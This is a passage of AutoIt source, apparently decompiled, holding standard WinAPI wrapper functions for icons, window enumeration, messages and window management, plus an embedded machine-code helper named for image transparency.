RETURN $AICON ENDFUNC FUNC _WINAPI_GETICONINFOEX ($HICON ) LOCAL $TIIEX = DLLSTRUCTCREATE ("dword;int;dword;dword;ptr;ptr;ushort;wchar[260];wchar[260]" ) DLLSTRUCTSETDATA ($TIIEX , 1 , DLLSTRUCTGETSIZE ($TIIEX ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetIconInfoExW" , "handle" , $HICON , "struct*" , $TIIEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [8 ] FOR $I = 0 TO 7 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TIIEX , $I + 2 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_LOADICON ($HINSTANCE , $SNAME ) LOCAL $STYPEOFNAME = "int" IF ISSTRING ($SNAME ) THEN $STYPEOFNAME = "wstr" ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "LoadIconW" , "handle" , $HINSTANCE , $STYPEOFNAME , $SNAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_LOADICONMETRIC ($HINSTANCE , $SNAME , $IMETRIC ) LOCAL $STYPEOFNAME = "int" IF ISSTRING ($SNAME ) THEN $STYPEOFNAME = "wstr" ENDIF LOCAL $ARET = DLLCALL ("comctl32.dll" , "long" , "LoadIconMetric" , "handle" , $HINSTANCE , $STYPEOFNAME , $SNAME , "int" , $IMETRIC , "handle*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_LOADICONWITHSCALEDOWN ($HINSTANCE , $SNAME , $IWIDTH , $IHEIGHT ) LOCAL $STYPEOFNAME = "int" IF ISSTRING ($SNAME ) THEN $STYPEOFNAME = "wstr" ENDIF LOCAL $ARET = DLLCALL ("comctl32.dll" , "long" , "LoadIconWithScaleDown" , "handle" , $HINSTANCE , $STYPEOFNAME , $SNAME , "int" , $IWIDTH , "int" , $IHEIGHT , "handle*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_LOADSHELL32ICON ($IICONID ) LOCAL $TICONS = DLLSTRUCTCREATE ("ptr Data" ) LOCAL $IICONS = _WINAPI_EXTRACTICONEX ("shell32.dll" , $IICONID , 0 , $TICONS , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $IICONS <= 0 THEN RETURN SETERROR (10 , 0 , 0 ) RETURN DLLSTRUCTGETDATA ($TICONS , "Data" ) ENDFUNC FUNC _WINAPI_LOOKUPICONIDFROMDIRECTORYEX ($PDATA , $BICON = TRUE , $IXDESIREDPIXELS = 0 , $IYDESIREDPIXELS = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "LookupIconIdFromDirectoryEx" , "ptr" , $PDATA , "bool" , $BICON , "int" , $IXDESIREDPIXELS , "int" , $IYDESIREDPIXELS , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MIRRORICON ($HICON , $BDELETE = FALSE ) IF NOT $BDELETE THEN $HICON = _WINAPI_COPYICON ($HICON ) ENDIF LOCAL $ARET = DLLCALL ("comctl32.dll" , "int" , 414 , "ptr" , 0 , "ptr*" , $HICON ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR + 10 IF $HICON AND NOT $BDELETE THEN _WINAPI_DESTROYICON ($HICON ) ENDIF RETURN SETERROR ($IERROR , 0 , 0 ) ENDIF RETURN $ARET [2 ] ENDFUNC #EndRegion Public Functions #Region Embedded DLL Functions FUNC __TRANSPARENCYPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC = __INIT (BINARY ("0x48894C240848895424104C894424184C894C24205541574831C0505050505050" & "4883EC284883BC24800000000074054831C0EB0748C7C0010000004821C07522" & "488BAC248000000048837D180074054831C0EB0748C7C0010000004821C07502" & "EB0948C7C001000000EB034831C04821C0740B4831C04863C0E93C0100004C63" & "7C24784983FF647E0F48C7C0010000004863C0E9220100004C637C24784D21FF" & "7D08C74424780000000048C74424280100000048C74424300000000048C74424" & "3800000000488BAC24800000004C637D04488BAC2480000000486345084C0FAF" & "F849C1E7024983C7FC4C3B7C24380F8C88000000488BAC24800000004C8B7D18" & "4C037C24384983C7034C897C2440488B6C2440480FB64500505888442448807C" & "244800744B4C0FB67C244848634424784C0FAFF84C89F848C7C1640000004899" & "48F7F94989C74C89F850488B6C244858884500488B6C2440807D0000740948C7" & "4424280000000048C7442430010000004883442438040F8149FFFFFF48837C24" & "3000741148837C242800740948C7C001000000EB034831C04821C0740E48C7C0" & "FFFFFFFF4863C0EB11EB0C48C7C0010000004863C0EB034831C04883C458415F" & "5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555331C05050505050837C242800740431C0EB05B80100000021C075198B6C24" & "28837D1400740431C0EB05B80100000021C07502EB07B801000000EB0231C021" & "C0740731C0E9E50000008B5C242483FB647E0AB801000000E9D20000008B5C24" & "2421DB7D08C744242400000000C7042401000000C744240400000000C7442408" & "000000008B6C24288B5D048B6C24280FAF5D08C1E30283C3FC3B5C24087C648B" & "6C24288B5D14035C240883C303895C240C8B6C240C0FB6450088442410807C24" & "100074380FB65C24100FAF5C242489D8B96400000099F7F989C3538B6C241058" & "8845008B6C240C807D00007407C7042400000000C74424040100000083442408" & "047181837C240400740D833C24007407B801000000EB0231C021C07409B8FFFF" & "FFFFEB0BEB07B801000000EB0231C083C4145B5DC21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC #EndRegion Embedded DLL Functions FUNC _SENDMESSAGE ($HWND , $IMSG , $WPARAM = 0 , $LPARAM = 0 , $IRETURN = 0 , $WPARAMTYPE = "wparam" , $LPARAMTYPE = "lparam" , $SRETURNTYPE = "lresult" ) LOCAL $ARESULT = DLLCALL ("user32.dll" , $SRETURNTYPE , "SendMessageW" , "hwnd" , $HWND , "uint" , $IMSG , $WPARAMTYPE , $WPARAM , $LPARAMTYPE , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $IRETURN >= 0 AND $IRETURN <= 4 THEN RETURN $ARESULT [$IRETURN ] RETURN $ARESULT ENDFUNC FUNC _SENDMESSAGEA ($HWND , $IMSG , $WPARAM = 0 , $LPARAM = 0 , $IRETURN = 0 , $WPARAMTYPE = "wparam" , $LPARAMTYPE = "lparam" , $SRETURNTYPE = "lresult" ) LOCAL $ARESULT = DLLCALL ("user32.dll" , $SRETURNTYPE , "SendMessageA" , "hwnd" , $HWND , "uint" , $IMSG , $WPARAMTYPE , $WPARAM , $LPARAMTYPE , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $IRETURN >= 0 AND $IRETURN <= 4 THEN RETURN $ARESULT [$IRETURN ] RETURN $ARESULT ENDFUNC #Region Global Variables and Constants GLOBAL $__G_AINPROCESS_WINAPI [64 ] [2 ] = [[0 , 0 ] ] GLOBAL $__G_AWINLIST_WINAPI [64 ] [2 ] = [[0 , 0 ] ] GLOBAL CONST $GW_HWNDFIRST = 0 GLOBAL CONST $GW_HWNDLAST = 1 GLOBAL CONST $GW_HWNDNEXT = 2 GLOBAL CONST $GW_HWNDPREV = 3 GLOBAL CONST $GW_OWNER = 4 GLOBAL CONST $GW_CHILD = 5 GLOBAL CONST $GW_ENABLEDPOPUP = 6 GLOBAL CONST $GWL_WNDPROC = 4294967292 GLOBAL CONST $GWL_HINSTANCE = 4294967290 GLOBAL CONST $GWL_HWNDPARENT = 4294967288 GLOBAL CONST $GWL_ID = 4294967284 GLOBAL CONST $GWL_STYLE = 4294967280 GLOBAL CONST $GWL_EXSTYLE = 4294967276 GLOBAL CONST $GWL_USERDATA = 4294967275 GLOBAL CONST $__WINAPICONSTANT_WM_SETFONT = 48 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATEWINDOWEX ($IEXSTYLE , $SCLASS , $SNAME , $ISTYLE , $IX , $IY , $IWIDTH , $IHEIGHT , $HPARENT , $HMENU = 0 , $HINSTANCE = 0 , $PPARAM = 0 ) IF $HINSTANCE = 0 THEN $HINSTANCE = _WINAPI_GETMODULEHANDLE ("" ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "CreateWindowExW" , "dword" , $IEXSTYLE , "wstr" , $SCLASS , "wstr" , $SNAME , "dword" , $ISTYLE , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "hwnd" , $HPARENT , "handle" , $HMENU , "handle" , $HINSTANCE , "struct*" , $PPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCLIENTRECT ($HWND ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetClientRect" , "hwnd" , $HWND , "struct*" , $TRECT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_GETDESKTOPWINDOW () LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetDesktopWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DESTROYWINDOW ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "DestroyWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ENABLEWINDOW ($HWND , $BENABLE = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "EnableWindow" , "hwnd" , $HWND , "bool" , $BENABLE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ENUMWINDOWS ($BVISIBLE = TRUE , $HWND = DEFAULT ) __WINAPI_ENUMWINDOWSINIT () IF $HWND = DEFAULT THEN $HWND = _WINAPI_GETDESKTOPWINDOW () __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE ) RETURN $__G_AWINLIST_WINAPI ENDFUNC FUNC _WINAPI_ENUMWINDOWSPOPUP () __WINAPI_ENUMWINDOWSINIT () LOCAL $HWND = _WINAPI_GETWINDOW (_WINAPI_GETDESKTOPWINDOW () , $GW_CHILD ) LOCAL $SCLASS WHILE $HWND <> 0 IF _WINAPI_ISWINDOWVISIBLE ($HWND ) THEN $SCLASS = _WINAPI_GETCLASSNAME ($HWND ) IF $SCLASS = "#32768" THEN __WINAPI_ENUMWINDOWSADD ($HWND ) ELSEIF $SCLASS = "ToolbarWindow32" THEN __WINAPI_ENUMWINDOWSADD ($HWND ) ELSEIF $SCLASS = "ToolTips_Class32" THEN __WINAPI_ENUMWINDOWSADD ($HWND ) ELSEIF $SCLASS = "BaseBar" THEN __WINAPI_ENUMWINDOWSCHILD ($HWND ) ENDIF ENDIF $HWND = _WINAPI_GETWINDOW ($HWND , $GW_HWNDNEXT ) WEND RETURN $__G_AWINLIST_WINAPI ENDFUNC FUNC _WINAPI_ENUMWINDOWSTOP () __WINAPI_ENUMWINDOWSINIT () LOCAL $HWND = _WINAPI_GETWINDOW (_WINAPI_GETDESKTOPWINDOW () , $GW_CHILD ) WHILE $HWND <> 0 IF _WINAPI_ISWINDOWVISIBLE ($HWND ) THEN __WINAPI_ENUMWINDOWSADD ($HWND ) $HWND = _WINAPI_GETWINDOW ($HWND , $GW_HWNDNEXT ) WEND RETURN $__G_AWINLIST_WINAPI ENDFUNC FUNC _WINAPI_GETCLASSNAME ($HWND ) IF NOT ISHWND ($HWND ) THEN $HWND = GUICTRLGETHANDLE ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetClassNameW" , "hwnd" , $HWND , "wstr" , "" , "int" , 4096 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [2 ] ) ENDFUNC FUNC _WINAPI_GETFOCUS () LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetFocus" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETPARENT ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetParent" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSYSCOLOR ($IINDEX ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "INT" , "GetSysColor" , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSYSTEMMETRICS ($IINDEX ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetSystemMetrics" , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOW ($HWND , $ICMD ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetWindow" , "hwnd" , $HWND , "uint" , $ICMD ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWHEIGHT ($HWND ) LOCAL $TRECT = _WINAPI_GETWINDOWRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Bottom" ) - DLLSTRUCTGETDATA ($TRECT , "Top" ) ENDFUNC FUNC _WINAPI_GETWINDOWLONG ($HWND , $IINDEX ) LOCAL $SFUNCNAME = "GetWindowLongW" IF @AUTOITX64 THEN $SFUNCNAME = "GetWindowLongPtrW" LOCAL $ARESULT = DLLCALL ("user32.dll" , "long_ptr" , $SFUNCNAME , "hwnd" , $HWND , "int" , $IINDEX ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWRECT ($HWND ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowRect" , "hwnd" , $HWND , "struct*" , $TRECT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_GETWINDOWTEXT ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetWindowTextW" , "hwnd" , $HWND , "wstr" , "" , "int" , 4096 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [2 ] ) ENDFUNC FUNC _WINAPI_GETWINDOWTHREADPROCESSID ($HWND , BYREF $IPID ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "dword" , "GetWindowThreadProcessId" , "hwnd" , $HWND , "dword*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) $IPID = $ARESULT [2 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWWIDTH ($HWND ) LOCAL $TRECT = _WINAPI_GETWINDOWRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Right" ) - DLLSTRUCTGETDATA ($TRECT , "Left" ) ENDFUNC FUNC _WINAPI_INPROCESS ($HWND , BYREF $HLASTWND ) IF $HWND = $HLASTWND THEN RETURN TRUE FOR $II = $__G_AINPROCESS_WINAPI [0 ] [0 ] TO 1 STEP + 4294967295 IF $HWND = $__G_AINPROCESS_WINAPI [$II ] [0 ] THEN IF $__G_AINPROCESS_WINAPI [$II ] [1 ] THEN $HLASTWND = $HWND RETURN TRUE ELSE RETURN FALSE ENDIF ENDIF NEXT LOCAL $IPID _WINAPI_GETWINDOWTHREADPROCESSID ($HWND , $IPID ) LOCAL $ICOUNT = $__G_AINPROCESS_WINAPI [0 ] [0 ] + 1 IF $ICOUNT >= 64 THEN $ICOUNT = 1 $__G_AINPROCESS_WINAPI [0 ] [0 ] = $ICOUNT $__G_AINPROCESS_WINAPI [$ICOUNT ] [0 ] = $HWND $__G_AINPROCESS_WINAPI [$ICOUNT ] [1 ] = ($IPID = @AUTOITPID ) RETURN $__G_AINPROCESS_WINAPI [$ICOUNT ] [1 ] ENDFUNC FUNC _WINAPI_INVALIDATERECT ($HWND , $TRECT = 0 , $BERASE = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "InvalidateRect" , "hwnd" , $HWND , "struct*" , $TRECT , "bool" , $BERASE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ISCLASSNAME ($HWND , $SCLASSNAME ) LOCAL $SSEPARATOR = OPT ("GUIDataSeparatorChar" ) LOCAL $ACLASSNAME = STRINGSPLIT ($SCLASSNAME , $SSEPARATOR ) IF NOT ISHWND ($HWND ) THEN $HWND = GUICTRLGETHANDLE ($HWND ) LOCAL $SCLASSCHECK = _WINAPI_GETCLASSNAME ($HWND ) FOR $X = 1 TO UBOUND ($ACLASSNAME ) + 4294967295 IF STRINGUPPER (STRINGMID ($SCLASSCHECK , 1 , STRINGLEN ($ACLASSNAME [$X ] ) ) ) = STRINGUPPER ($ACLASSNAME [$X ] ) THEN RETURN TRUE NEXT RETURN FALSE ENDFUNC FUNC _WINAPI_ISWINDOW ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "IsWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ISWINDOWVISIBLE ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "IsWindowVisible" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_MOVEWINDOW ($HWND , $IX , $IY , $IWIDTH , $IHEIGHT , $BREPAINT = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "MoveWindow" , "hwnd" , $HWND , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "bool" , $BREPAINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETFOCUS ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetFocus" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETFONT ($HWND , $HFONT , $BREDRAW = TRUE ) _SENDMESSAGE ($HWND , $__WINAPICONSTANT_WM_SETFONT , $HFONT , $BREDRAW , 0 , "hwnd" ) ENDFUNC FUNC _WINAPI_SETPARENT ($HWNDCHILD , $HWNDPARENT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetParent" , "hwnd" , $HWNDCHILD , "hwnd" , $HWNDPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWPOS ($HWND , $HAFTER , $IX , $IY , $ICX , $ICY , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowPos" , "hwnd" , $HWND , "hwnd" , $HAFTER , "int" , $IX , "int" , $IY , "int" , $ICX , "int" , $ICY , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWTEXT ($HWND , $STEXT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowTextW" , "hwnd" , $HWND , "wstr" , $STEXT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHOWWINDOW ($HWND , $ICMDSHOW = 5 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "ShowWindow" , "hwnd" , $HWND , "int" , $ICMDSHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UPDATEWINDOW ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UpdateWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __WINAPI_ENUMWINDOWSADD ($HWND , $SCLASS = "" ) IF $SCLASS = "" THEN $SCLASS = _WINAPI_GETCLASSNAME ($HWND ) $__G_AWINLIST_WINAPI [0 ] [0 ] += 1 LOCAL $ICOUNT = $__G_AWINLIST_WINAPI [0 ] [0 ] IF $ICOUNT >= $__G_AWINLIST_WINAPI [0 ] [1 ] THEN REDIM $__G_AWINLIST_WINAPI [$ICOUNT + 64 ] [2 ] $__G_AWINLIST_WINAPI [0 ] [1 ] += 64 ENDIF $__G_AWINLIST_WINAPI [$ICOUNT ] [0 ] = $HWND $__G_AWINLIST_WINAPI [$ICOUNT ] [1 ] = $SCLASS ENDFUNC FUNC __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE = TRUE ) $HWND = _WINAPI_GETWINDOW ($HWND , $GW_CHILD ) WHILE $HWND <> 0 IF (NOT $BVISIBLE ) OR _WINAPI_ISWINDOWVISIBLE ($HWND ) THEN __WINAPI_ENUMWINDOWSADD ($HWND ) __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE ) ENDIF $HWND = _WINAPI_GETWINDOW ($HWND , $GW_HWNDNEXT ) WEND ENDFUNC FUNC __WINAPI_ENUMWINDOWSINIT () REDIM $__G_AWINLIST_WINAPI [64 ] [2 ] $__G_AWINLIST_WINAPI [0 ] [0 ] = 0 $__G_AWINLIST_WINAPI [0 ] [1 ] = 64 ENDFUNC #EndRegion Internal Functions GLOBAL CONST $FLASHW_CAPTION = 1 GLOBAL CONST $FLASHW_TRAY = 2 GLOBAL CONST $FLASHW_TIMER = 4 GLOBAL CONST $FLASHW_TIMERNOFG = 12 GLOBAL CONST $TAGUPDATELAYEREDWINDOWINFO = "dword Size;hwnd hDstDC;long DstX;long DstY;long cX;long cY;hwnd hSrcDC;long SrcX;long SrcY;dword crKey;byte BlendOp;byte BlendFlags;byte Alpha;byte AlphaFormat;dword Flags;long DirtyLeft;long DirtyTop;long DirtyRight;long DirtyBottom" GLOBAL CONST $TAGWINDOWINFO = "dword Size;struct;long rWindow[4];endstruct;struct;long rClient[4];endstruct;dword Style;dword ExStyle;dword WindowStatus;uint cxWindowBorders;uint cyWindowBorders;word atomWindowType;word CreatorVersion" GLOBAL CONST $TAGWNDCLASS = "uint Style;ptr hWndProc;int ClsExtra;int WndExtra;ptr hInstance;ptr hIcon;ptr hCursor;ptr hBackground;ptr MenuName;ptr ClassName" GLOBAL CONST $TAGWNDCLASSEX = "uint Size;uint Style;ptr hWndProc;int ClsExtra;int WndExtra;ptr hInstance;ptr hIcon;ptr hCursor;ptr hBackground;ptr MenuName;ptr ClassName;ptr hIconSm" GLOBAL CONST $TAGFLASHWINFO = "uint Size;hwnd hWnd;dword Flags;uint Count;dword TimeOut" FUNC _WINAPI_ADJUSTWINDOWRECTEX (BYREF $TRECT , $ISTYLE , $IEXSTYLE = 0 , $BMENU = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AdjustWindowRectEx" , "struct*" , $TRECT , "dword" , $ISTYLE , "bool" , $BMENU , "dword" , $IEXSTYLE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ANIMATEWINDOW ($HWND , $IFLAGS , $IDURATION = 1000 ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AnimateWindow" , "hwnd" , $HWND , "dword" , $IDURATION , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BEGINDEFERWINDOWPOS ($IAMOUNT = 1 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "BeginDeferWindowPos" , "int" , $IAMOUNT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BRINGWINDOWTOTOP ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "BringWindowToTop" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BROADCASTSYSTEMMESSAGE ($IMSG , $WPARAM = 0 , $LPARAM = 0 , $IFLAGS = 0 , $IRECIPIENTS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "long" , "BroadcastSystemMessageW" , "dword" , $IFLAGS , "dword*" , $IRECIPIENTS , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN SETEXTENDED ($ARET [2 ] , $ARET [0 ] ) ENDFUNC FUNC _WINAPI_CALLWINDOWPROC ($PPREVWNDFUNC , $HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , $PPREVWNDFUNC , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CALLWINDOWPROCW ($PPREVWNDPROC , $HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProcW" , "ptr" , $PPREVWNDPROC , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CASCADEWINDOWS ($AWNDS , $TRECT = 0 , $HPARENT = 0 , $IFLAGS = 0 , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($AWNDS , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ICOUNT = $IEND - $ISTART + 1 LOCAL $TWNDS = DLLSTRUCTCREATE ("hwnd[" & $ICOUNT & "]" ) $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TWNDS , 1 , $AWNDS [$I ] , $ICOUNT ) $ICOUNT += 1 NEXT LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "CascadeWindows" , "hwnd" , $HPARENT , "uint" , $IFLAGS , "struct*" , $TRECT , "uint" , $ICOUNT + 4294967295 , "struct*" , $TWNDS ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CHANGEWINDOWMESSAGEFILTEREX ($HWND , $IMSG , $IACTION ) LOCAL $TCFS , $ARET IF $HWND AND ($__WINVER > 1536 ) THEN LOCAL CONST $TAGCHANGEFILTERSTRUCT = "dword cbSize; dword ExtStatus" $TCFS = DLLSTRUCTCREATE ($TAGCHANGEFILTERSTRUCT ) DLLSTRUCTSETDATA ($TCFS , 1 , DLLSTRUCTGETSIZE ($TCFS ) ) $ARET = DLLCALL ("user32.dll" , "bool" , "ChangeWindowMessageFilterEx" , "hwnd" , $HWND , "uint" , $IMSG , "dword" , $IACTION , "struct*" , $TCFS ) ELSE $TCFS = 0 $ARET = DLLCALL ("user32.dll" , "bool" , "ChangeWindowMessageFilter" , "uint" , $IMSG , "dword" , $IACTION ) ENDIF IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN SETEXTENDED (DLLSTRUCTGETDATA ($TCFS , 2 ) , 1 ) 